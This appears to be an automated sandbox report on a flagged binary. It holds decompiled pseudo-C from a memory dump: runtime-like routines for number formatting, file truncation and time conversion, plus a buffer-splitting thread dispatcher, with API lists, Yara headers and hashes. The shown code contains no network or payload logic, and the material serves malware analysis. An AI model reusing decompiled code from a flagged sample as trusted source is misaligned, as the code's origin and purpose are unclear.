                                                                                                										if(__eflags < 0) {
                                                                                                											L56:
                                                                                                											__eflags = _t187 - _t182;
                                                                                                											if(_t187 != _t182) {
                                                                                                												L60:
                                                                                                												_push(0);
                                                                                                												_push(0xa);
                                                                                                												_push(_t137);
                                                                                                												_push(_t151);
                                                                                                												_t102 = E00451C80();
                                                                                                												_v32 = _t174;
                                                                                                												 *_t187 = _t102 + 0x30;
                                                                                                												_t187 = _t187 + 1;
                                                                                                												__eflags = _t187;
                                                                                                												L61:
                                                                                                												_t104 = 0x30;
                                                                                                												_t183 = 0;
                                                                                                												__eflags = 0;
                                                                                                												 *_t187 = _t151 + _t104;
                                                                                                												 *(_t187 + 1) = 0;
                                                                                                												goto L62;
                                                                                                											}
                                                                                                											__eflags = _t137;
                                                                                                											if(__eflags < 0) {
                                                                                                												goto L61;
                                                                                                											}
                                                                                                											if(__eflags > 0) {
                                                                                                												goto L60;
                                                                                                											}
                                                                                                											__eflags = _t151 - 0xa;
                                                                                                											if(_t151 < 0xa) {
                                                                                                												goto L61;
                                                                                                											}
                                                                                                											goto L60;
                                                                                                										}
                                                                                                										if(__eflags > 0) {
                                                                                                											L51:
                                                                                                											_push(0);
                                                                                                											_push(0x3e8);
                                                                                                											_push(_t137);
                                                                                                											_push(_t151);
                                                                                                											_t107 = E00451C80();
                                                                                                											_v32 = _t174;
                                                                                                											 *_t187 = _t107 + 0x30;
                                                                                                											_t187 = _t187 + 1;
                                                                                                											__eflags = _t187 - _t182;
                                                                                                											if(_t187 != _t182) {
                                                                                                												L55:
                                                                                                												_push(0);
                                                                                                												_push(0x64);
                                                                                                												_push(_t137);
                                                                                                												_push(_t151);
                                                                                                												_t109 = E00451C80();
                                                                                                												_v32 = _t174;
                                                                                                												 *_t187 = _t109 + 0x30;
                                                                                                												_t187 = _t187 + 1;
                                                                                                												__eflags = _t187;
                                                                                                												goto L56;
                                                                                                											}
                                                                                                											L52:
                                                                                                											__eflags = _t137;
                                                                                                											if(__eflags < 0) {
                                                                                                												goto L56;
                                                                                                											}
                                                                                                											if(__eflags > 0) {
                                                                                                												goto L55;
                                                                                                											}
                                                                                                											__eflags = _t151 - 0x64;
                                                                                                											if(_t151 < 0x64) {
                                                                                                												goto L56;
                                                                                                											}
                                                                                                											goto L55;
                                                                                                										}
                                                                                                										__eflags = _t151 - 0x3e8;
                                                                                                										if(_t151 < 0x3e8) {
                                                                                                											goto L52;
                                                                                                										}
                                                                                                										goto L51;
                                                                                                									}
                                                                                                									__eflags = _t151;
                                                                                                									if(_t151 < 0) {
                                                                                                										goto L47;
                                                                                                									}
                                                                                                									goto L46;
                                                                                                								}
                                                                                                							}
                                                                                                							goto L23;
                                                                                                						}
                                                                                                					}
                                                                                                					__eflags = 0;
                                                                                                					if(0 != 0) {
                                                                                                						goto L11;
                                                                                                					} else {
                                                                                                						_t183 = E0044673A(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                                                                						__eflags = _t183;
                                                                                                						if(_t183 == 0) {
                                                                                                							_t128 = E00452060(_t184, 0x65);
                                                                                                							_pop(_t166);
                                                                                                							__eflags = _t128;
                                                                                                							if(_t128 != 0) {
                                                                                                								__eflags = _a28;
                                                                                                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                                								__eflags = _t170;
                                                                                                								 *_t128 = _t170;
                                                                                                								 *((char*)(_t128 + 3)) = 0;
                                                                                                							}
                                                                                                							_t183 = 0;
                                                                                                						} else {
                                                                                                							 *_t184 = 0;
                                                                                                						}
                                                                                                						goto L62;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t129 = E00438932();
                                                                                                					_t183 = 0x22;
                                                                                                					 *_t129 = _t183;
                                                                                                					E00437709();
                                                                                                					L62:
                                                                                                					if(_v40 != 0) {
                                                                                                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                                                                					}
                                                                                                					return _t183;
                                                                                                				}
                                                                                                			}
                                                                                                0x004465fd
                                                                                                0x00446602
                                                                                                0x00446606
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044660a
                                                                                                0x0044660a
                                                                                                0x0044660d
                                                                                                0x0044660e
                                                                                                0x0044660e
                                                                                                0x00446610
                                                                                                0x00446613
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00446615
                                                                                                0x00446618
                                                                                                0x0044661f
                                                                                                0x00446622
                                                                                                0x00446625
                                                                                                0x0044663b
                                                                                                0x0044663b
                                                                                                0x0044663b
                                                                                                0x00446627
                                                                                                0x00446627
                                                                                                0x00446629
                                                                                                0x0044662c
                                                                                                0x00446637
                                                                                                0x0044662e
                                                                                                0x00446631
                                                                                                0x00446631
                                                                                                0x0044662c
                                                                                                0x00000000
                                                                                                0x00446625
                                                                                                0x0044661a
                                                                                                0x0044661a
                                                                                                0x0044661c
                                                                                                0x0044661c
                                                                                                0x00446570
                                                                                                0x00446570
                                                                                                0x00446573
                                                                                                0x0044663e
                                                                                                0x0044663e
                                                                                                0x00446640
                                                                                                0x00446642
                                                                                                0x00446645
                                                                                                0x00446646
                                                                                                0x00446647
                                                                                                0x00446648
                                                                                                0x00446650
                                                                                                0x00446650
                                                                                                0x00446650
                                                                                                0x00446652
                                                                                                0x00446655
                                                                                                0x00446658
                                                                                                0x0044665a
                                                                                                0x0044665a
                                                                                                0x0044665c
                                                                                                0x0044666e
                                                                                                0x00446672
                                                                                                0x00446675
                                                                                                0x0044667c
                                                                                                0x00446684
                                                                                                0x00446684
                                                                                                0x00446687
                                                                                                0x00446689
                                                                                                0x0044669a
                                                                                                0x0044669a
                                                                                                0x0044669e
                                                                                                0x0044669e
                                                                                                0x004466a1
                                                                                                0x004466a3
                                                                                                0x004466a6
                                                                                                0x00000000
                                                                                                0x0044668b
                                                                                                0x0044668b
                                                                                                0x00446691
                                                                                                0x00446691
                                                                                                0x00446695
                                                                                                0x004466a8
                                                                                                0x004466a8
                                                                                                0x004466ac
                                                                                                0x004466ad
                                                                                                0x004466af
                                                                                                0x004466b1
                                                                                                0x004466f2
                                                                                                0x004466f2
                                                                                                0x004466f4
                                                                                                0x00446701
                                                                                                0x00446701
                                                                                                0x00446703
                                                                                                0x00446705
                                                                                                0x00446706
                                                                                                0x00446707
                                                                                                0x0044670e
                                                                                                0x00446711
                                                                                                0x00446713
                                                                                                0x00446713
                                                                                                0x00446714
                                                                                                0x00446716
                                                                                                0x00446719
                                                                                                0x00446719
                                                                                                0x0044671b
                                                                                                0x0044671d
                                                                                                0x00000000
                                                                                                0x0044671d
                                                                                                0x004466f6
                                                                                                0x004466f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466fc
                                                                                                0x004466ff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466ff
                                                                                                0x004466b8
                                                                                                0x004466be
                                                                                                0x004466be
                                                                                                0x004466c0
                                                                                                0x004466c1
                                                                                                0x004466c2
                                                                                                0x004466c3
                                                                                                0x004466ca
                                                                                                0x004466cd
                                                                                                0x004466cf
                                                                                                0x004466d0
                                                                                                0x004466d2
                                                                                                0x004466df
                                                                                                0x004466df
                                                                                                0x004466e1
                                                                                                0x004466e3
                                                                                                0x004466e4
                                                                                                0x004466e5
                                                                                                0x004466ec
                                                                                                0x004466ef
                                                                                                0x004466f1
                                                                                                0x004466f1
                                                                                                0x00000000
                                                                                                0x004466f1
                                                                                                0x004466d4
                                                                                                0x004466d4
                                                                                                0x004466d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466da
                                                                                                0x004466dd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466dd
                                                                                                0x004466ba
                                                                                                0x004466bc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466bc
                                                                                                0x0044668d
                                                                                                0x0044668f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044668f
                                                                                                0x00446689
                                                                                                0x00000000
                                                                                                0x00446573
                                                                                                0x0044656e
                                                                                                0x00446495
                                                                                                0x00446497
                                                                                                0x00000000
                                                                                                0x00446499
                                                                                                0x004464af
                                                                                                0x004464b4
                                                                                                0x004464b6
                                                                                                0x004464c2
                                                                                                0x004464c8
                                                                                                0x004464c9
                                                                                                0x004464cb
                                                                                                0x004464cd
                                                                                                0x004464d8
                                                                                                0x004464d8
                                                                                                0x004464db
                                                                                                0x004464dd
                                                                                                0x004464dd
                                                                                                0x004464e0
                                                                                                0x004464b8
                                                                                                0x004464b8
                                                                                                0x004464b8
                                                                                                0x00000000
                                                                                                0x004464b6
                                                                                                0x00446465
                                                                                                0x00446465
                                                                                                0x0044646c
                                                                                                0x0044646d
                                                                                                0x0044646f
                                                                                                0x00446721
                                                                                                0x00446725
                                                                                                0x0044672a
                                                                                                0x0044672a
                                                                                                0x00446739
                                                                                                0x00446739

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: a2af8cd21c2361a18f5803fc1ec8a9b21ea48ba1414fc2e6034b653dd8d9e311
                                                                                                • Instruction ID: 7c9d71291fbcf27f37b0e9d1649a705ae8ff0ac9e89dd52880ecb220803812e0
                                                                                                • Opcode Fuzzy Hash: a2af8cd21c2361a18f5803fc1ec8a9b21ea48ba1414fc2e6034b653dd8d9e311
                                                                                                • Instruction Fuzzy Hash: CAA147729003469FFB218F58C8917AEBBE5EF12354F16416FE8859B381C63C8D42C75A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00451434(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                				int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t16;
                                                                                                				signed int _t17;
                                                                                                				int _t20;
                                                                                                				signed int _t21;
                                                                                                				int _t23;
                                                                                                				signed int _t25;
                                                                                                				int _t28;
                                                                                                				intOrPtr* _t30;
                                                                                                				int _t34;
                                                                                                				int _t35;
                                                                                                				void* _t36;
                                                                                                				intOrPtr* _t37;
                                                                                                				intOrPtr* _t38;
                                                                                                				int _t46;
                                                                                                				void* _t54;
                                                                                                				void* _t56;
                                                                                                				signed int _t58;
                                                                                                				int _t61;
                                                                                                				int _t63;
                                                                                                				void* _t64;
                                                                                                				void* _t65;
                                                                                                				void* _t66;
                                                                                                
                                                                                                				_t58 = __edx;
                                                                                                				_t59 = _a4;
                                                                                                				_t61 = 0;
                                                                                                				_t16 = E00446077(_a4, 0, 0, 1);
                                                                                                				_v20 = _t16;
                                                                                                				_v16 = __edx;
                                                                                                				_t65 = _t64 + 0x10;
                                                                                                				if((_t16 & __edx) != 0xffffffff) {
                                                                                                					_t17 = E00446077(_t59, 0, 0, 2);
                                                                                                					_t66 = _t65 + 0x10;
                                                                                                					_t51 = _t17 & __edx;
                                                                                                					__eflags = (_t17 & __edx) - 0xffffffff;
                                                                                                					if((_t17 & __edx) == 0xffffffff) {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					_t46 = _a8 - _t17;
                                                                                                					__eflags = _t46;
                                                                                                					_t20 = _a12;
                                                                                                					asm("sbb eax, edx");
                                                                                                					_v8 = _t20;
                                                                                                					if(__eflags < 0) {
                                                                                                						L24:
                                                                                                						__eflags = _t20 - _t61;
                                                                                                						if(__eflags > 0) {
                                                                                                							L19:
                                                                                                							_t21 = E00446077(_t59, _v20, _v16, _t61);
                                                                                                							__eflags = (_t21 & _t58) - 0xffffffff;
                                                                                                							if((_t21 & _t58) != 0xffffffff) {
                                                                                                								_t23 = 0;
                                                                                                								__eflags = 0;
                                                                                                								L31:
                                                                                                								return _t23;
                                                                                                							}
                                                                                                							L20:
                                                                                                							_t23 =  *((intOrPtr*)(E00438932()));
                                                                                                							goto L31;
                                                                                                						}
                                                                                                						if(__eflags < 0) {
                                                                                                							L27:
                                                                                                							_t25 = E00446077(_t59, _a8, _a12, _t61);
                                                                                                							_t66 = _t66 + 0x10;
                                                                                                							__eflags = (_t25 & _t58) - 0xffffffff;
                                                                                                							if((_t25 & _t58) == 0xffffffff) {
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							_t28 = SetEndOfFile(E00449968(_t59));
                                                                                                							__eflags = _t28;
                                                                                                							if(_t28 != 0) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							 *((intOrPtr*)(E00438932())) = 0xd;
                                                                                                							_t30 = E0043891F();
                                                                                                							 *_t30 = GetLastError();
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _t46 - _t61;
                                                                                                						if(_t46 >= _t61) {
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						goto L27;
                                                                                                					}
                                                                                                					if(__eflags > 0) {
                                                                                                						L6:
                                                                                                						_t63 = E00440628(_t51, 0x1000, 1);
                                                                                                						_pop(_t54);
                                                                                                						__eflags = _t63;
                                                                                                						if(_t63 != 0) {
                                                                                                							_v12 = E0043EE34(_t54, _t59, 0x8000);
                                                                                                							_t34 = _v8;
                                                                                                							_pop(_t56);
                                                                                                							do {
                                                                                                								__eflags = _t34;
                                                                                                								if(__eflags < 0) {
                                                                                                									L13:
                                                                                                									_t35 = _t46;
                                                                                                									L14:
                                                                                                									_t36 = E004455F6(_t46, _t59, _t63, _t59, _t63, _t35);
                                                                                                									_t66 = _t66 + 0xc;
                                                                                                									__eflags = _t36 - 0xffffffff;
                                                                                                									if(_t36 == 0xffffffff) {
                                                                                                										_t37 = E0043891F();
                                                                                                										__eflags =  *_t37 - 5;
                                                                                                										if( *_t37 == 5) {
                                                                                                											 *((intOrPtr*)(E00438932())) = 0xd;
                                                                                                										}
                                                                                                										L23:
                                                                                                										_t38 = E00438932();
                                                                                                										E004414D5(_t63);
                                                                                                										_t23 =  *_t38;
                                                                                                										goto L31;
                                                                                                									}
                                                                                                									asm("cdq");
                                                                                                									_t46 = _t46 - _t36;
                                                                                                									_t34 = _v8;
                                                                                                									asm("sbb eax, edx");
                                                                                                									_v8 = _t34;
                                                                                                									__eflags = _t34;
                                                                                                									if(__eflags > 0) {
                                                                                                										L12:
                                                                                                										_t35 = 0x1000;
                                                                                                										goto L14;
                                                                                                									}
                                                                                                									if(__eflags < 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									goto L17;
                                                                                                								}
                                                                                                								if(__eflags > 0) {
                                                                                                									goto L12;
                                                                                                								}
                                                                                                								__eflags = _t46 - 0x1000;
                                                                                                								if(_t46 < 0x1000) {
                                                                                                									goto L13;
                                                                                                								}
                                                                                                								goto L12;
                                                                                                								L17:
                                                                                                								__eflags = _t46;
                                                                                                							} while (_t46 != 0);
                                                                                                							E0043EE34(_t56, _t59, _v12);
                                                                                                							E004414D5(_t63);
                                                                                                							_t66 = _t66 + 0xc;
                                                                                                							_t61 = 0;
                                                                                                							__eflags = 0;
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						 *((intOrPtr*)(E00438932())) = 0xc;
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					__eflags = _t46;
                                                                                                					if(_t46 <= 0) {
                                                                                                						goto L24;
                                                                                                					}
                                                                                                					goto L6;
                                                                                                				}
                                                                                                				L1:
                                                                                                				return  *((intOrPtr*)(E00438932()));
                                                                                                			}

































                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: dc4f15582d7156a15b2996a60c11fb5524768d57814c45d89d509fb6c11c0c68
                                                                                                • Instruction ID: 7a75bb327859eb2659dc8df3dd382e9718787d1dd5b64237a075061a11a99436
                                                                                                • Opcode Fuzzy Hash: dc4f15582d7156a15b2996a60c11fb5524768d57814c45d89d509fb6c11c0c68
                                                                                                • Instruction Fuzzy Hash: 9F411C716002147BDB206ABA8C85B7F37A4EF86376F14021FFC15D62B3EA7C4945866B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E0043D761(void* _a4, intOrPtr* _a8) {
                                                                                                				char _v5;
                                                                                                				intOrPtr _v12;
                                                                                                				char _v16;
                                                                                                				signed int _t44;
                                                                                                				char _t47;
                                                                                                				intOrPtr _t50;
                                                                                                				signed int _t52;
                                                                                                				signed int _t56;
                                                                                                				signed int _t57;
                                                                                                				void* _t59;
                                                                                                				signed int _t63;
                                                                                                				signed int _t65;
                                                                                                				char _t67;
                                                                                                				intOrPtr* _t68;
                                                                                                				intOrPtr* _t69;
                                                                                                				intOrPtr* _t71;
                                                                                                				intOrPtr _t75;
                                                                                                				void* _t76;
                                                                                                				void* _t77;
                                                                                                				signed int _t80;
                                                                                                				intOrPtr _t82;
                                                                                                				void* _t86;
                                                                                                				signed int _t87;
                                                                                                				void* _t89;
                                                                                                				signed int _t91;
                                                                                                				intOrPtr* _t98;
                                                                                                				void* _t101;
                                                                                                				intOrPtr _t102;
                                                                                                				intOrPtr _t103;
                                                                                                
                                                                                                				_t101 = _a4;
                                                                                                				if(_t101 != 0) {
                                                                                                					_t80 = 9;
                                                                                                					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                                                                                                					_t98 = _a8;
                                                                                                					__eflags = _t98;
                                                                                                					if(_t98 != 0) {
                                                                                                						_t82 =  *((intOrPtr*)(_t98 + 4));
                                                                                                						_t47 =  *_t98;
                                                                                                						_v16 = _t47;
                                                                                                						_v12 = _t82;
                                                                                                						__eflags = _t82 - 0xffffffff;
                                                                                                						if(__eflags > 0) {
                                                                                                							L7:
                                                                                                							_t89 = 7;
                                                                                                							__eflags = _t82 - _t89;
                                                                                                							if(__eflags < 0) {
                                                                                                								L12:
                                                                                                								_v5 = 0;
                                                                                                								_t50 = E0043D8AE(_t82, __eflags,  &_v16,  &_v5);
                                                                                                								_t75 = _v16;
                                                                                                								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                                                                                                								_t52 = E00451D60(_t75, _v12, 0x15180, 0);
                                                                                                								 *(_t101 + 0x1c) = _t52;
                                                                                                								_t86 = 0x45a248;
                                                                                                								_t76 = _t75 - _t52 * 0x15180;
                                                                                                								asm("sbb eax, edx");
                                                                                                								__eflags = _v5;
                                                                                                								if(_v5 == 0) {
                                                                                                									_t86 = 0x45a214;
                                                                                                								}
                                                                                                								_t91 =  *(_t101 + 0x1c);
                                                                                                								_t56 = 1;
                                                                                                								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                                                                                                								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                                                                                                									L16:
                                                                                                									_t57 = _t56 - 1;
                                                                                                									 *(_t101 + 0x10) = _t57;
                                                                                                									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                                                                                                									_t59 = E00451D60( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                                                                                                									_t87 = 7;
                                                                                                									asm("cdq");
                                                                                                									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                                                                                                									_t63 = E00451D60(_t76, _v12, 0xe10, 0);
                                                                                                									 *(_t101 + 8) = _t63;
                                                                                                									_t77 = _t76 - _t63 * 0xe10;
                                                                                                									asm("sbb edi, edx");
                                                                                                									_t65 = E00451D60(_t77, _v12, 0x3c, 0);
                                                                                                									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                                                                                                									 *(_t101 + 4) = _t65;
                                                                                                									_t67 = 0;
                                                                                                									__eflags = 0;
                                                                                                									 *_t101 = _t77 - _t65 * 0x3c;
                                                                                                									L17:
                                                                                                									return _t67;
                                                                                                								} else {
                                                                                                									do {
                                                                                                										_t56 = _t56 + 1;
                                                                                                										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                                                                                                									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                                                                                                									goto L16;
                                                                                                								}
                                                                                                							}
                                                                                                							if(__eflags > 0) {
                                                                                                								L10:
                                                                                                								_t68 = E00438932();
                                                                                                								_t102 = 0x16;
                                                                                                								 *_t68 = _t102;
                                                                                                								L11:
                                                                                                								_t67 = _t102;
                                                                                                								goto L17;
                                                                                                							}
                                                                                                							__eflags = _t47 - 0x934126cf;
                                                                                                							if(__eflags <= 0) {
                                                                                                								goto L12;
                                                                                                							}
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						if(__eflags < 0) {
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						__eflags = _t47 - 0xffff5740;
                                                                                                						if(_t47 < 0xffff5740) {
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					_t69 = E00438932();
                                                                                                					_t102 = 0x16;
                                                                                                					 *_t69 = _t102;
                                                                                                					E00437709();
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				_t71 = E00438932();
                                                                                                				_t103 = 0x16;
                                                                                                				 *_t71 = _t103;
                                                                                                				E00437709();
                                                                                                				return _t103;
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cfcc83807e8aa48eb067a98189ec7e97f374b551529161a41f4ec273b6343dfb
                                                                                                • Instruction ID: 60db8195558ebea133a4f370ada165e82a5afcab0d0b3de8392f875202c89dd8
                                                                                                • Opcode Fuzzy Hash: cfcc83807e8aa48eb067a98189ec7e97f374b551529161a41f4ec273b6343dfb
                                                                                                • Instruction Fuzzy Hash: 82410471E00308AFD724AF78DC41BAABBA8EF8C714F10962FF111DB691D779A9058784
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00404DB8(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				void* _v20;
                                                                                                				char _v44;
                                                                                                				char _v68;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* _t41;
                                                                                                				signed int _t46;
                                                                                                				void* _t70;
                                                                                                				void* _t73;
                                                                                                				void* _t74;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t77;
                                                                                                				void* _t101;
                                                                                                				intOrPtr _t103;
                                                                                                				void* _t105;
                                                                                                				void* _t106;
                                                                                                				void* _t107;
                                                                                                
                                                                                                				_t101 = __edx;
                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                				_t105 = __ecx;
                                                                                                				_v20 = __ecx;
                                                                                                				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
                                                                                                				E004020C7(_t74,  &_v44);
                                                                                                				_t103 = _a4;
                                                                                                				_t8 = _t105 + 0x58; // 0x46e2c0
                                                                                                				_t41 = _t8;
                                                                                                				while(E00404FEF(_t105, E00401F87(_t103),  &_v12, _t41) != 0) {
                                                                                                					_t10 = _t105 + 0x30; // 0x8
                                                                                                					_t46 =  *_t10 & 0x000000ff;
                                                                                                					_v16 = _t46;
                                                                                                					if(_v12 + _t46 <= E0040247B()) {
                                                                                                						_t77 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						_t77 = 1;
                                                                                                						_t73 = E0040247B();
                                                                                                						_t105 = _v20;
                                                                                                						_t103 = _a4;
                                                                                                						 *((intOrPtr*)(_t105 + 0x54)) = _v16 + _v12 - _t73;
                                                                                                					}
                                                                                                					if(_t77 == 0) {
                                                                                                						_t78 = _v16;
                                                                                                						E00401FC3( &_v44, _t101, _t105, E00404287(_t103,  &_v68, _v16, 0xffffffff));
                                                                                                						E00401FB9();
                                                                                                						E00401FC3( &_v44, _t101, _t105, E00404287( &_v44,  &_v68, 0, _v12));
                                                                                                						E00401FB9();
                                                                                                						_t112 = _a12;
                                                                                                						if(_a12 != 0) {
                                                                                                							_t30 = _t105 + 0xc; // 0x46e274
                                                                                                							E00401F9F(_t30,  &_v44);
                                                                                                							 *(_t105 + 0x24) = CreateEventA(0, 0, 0, 0);
                                                                                                							__eflags = 0;
                                                                                                							CreateThread(0, 0, _a8, _t105, 0, 0);
                                                                                                							_t33 = _t105 + 0x24; // 0x0
                                                                                                							WaitForSingleObject( *_t33, 0xffffffff);
                                                                                                							_t34 = _t105 + 0x24; // 0x0
                                                                                                							CloseHandle( *_t34);
                                                                                                						} else {
                                                                                                							_t107 = _t106 - 0x18;
                                                                                                							E004020DE(_t78, _t107, _t101, _t112,  &_v44);
                                                                                                							_a8(_t105);
                                                                                                							_t106 = _t107 + 0x1c;
                                                                                                						}
                                                                                                						E00401FC3(_t103, _t101, _t105, E00404287(_t103,  &_v68, _v12 + _t78, 0xffffffff));
                                                                                                						E00401FB9();
                                                                                                						_t70 = E0040247B();
                                                                                                						_t38 = _t105 + 0x58; // 0x46e2c0
                                                                                                						_t41 = _t38;
                                                                                                						if(_t70 != 0) {
                                                                                                							continue;
                                                                                                						}
                                                                                                					}
                                                                                                					break;
                                                                                                				}
                                                                                                				return E00401FB9();
                                                                                                			}






















                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000,000000FF,00000000,00000000,0046E2C0), ref: 00404EA5
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00000000,0046E268,00000000,00000000), ref: 00404EB8
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404D8B,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404EC3
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00404D8B,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404ECC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: 681d0d4f5c795077d1324a474250ae06d73184dde2bf6fe4c6d1fd733aa886b6
                                                                                                • Instruction ID: 28372df4b1887f6dd25af6fd127a3b2567dcd40b245f5bd33a3f33c0b357cf73
                                                                                                • Opcode Fuzzy Hash: 681d0d4f5c795077d1324a474250ae06d73184dde2bf6fe4c6d1fd733aa886b6
                                                                                                • Instruction Fuzzy Hash: C24165B1900219AFCB10EBA1CC55DFEB7BDAF44318F04066EF952B32D1DB74A9458B64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E0043E568(signed int __eax, void* __ecx) {
                                                                                                				signed int _t2;
                                                                                                				signed int _t3;
                                                                                                				int _t10;
                                                                                                				int _t11;
                                                                                                				void* _t13;
                                                                                                				short** _t16;
                                                                                                				char* _t19;
                                                                                                				void* _t20;
                                                                                                
                                                                                                				_t13 = __ecx;
                                                                                                				_t16 =  *0x46d4d4; // 0x676fa0
                                                                                                				if(_t16 != 0) {
                                                                                                					_t10 = 0;
                                                                                                					while( *_t16 != _t10) {
                                                                                                						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                                                                                                						_t11 = _t2;
                                                                                                						if(_t11 == 0) {
                                                                                                							L11:
                                                                                                							_t3 = _t2 | 0xffffffff;
                                                                                                						} else {
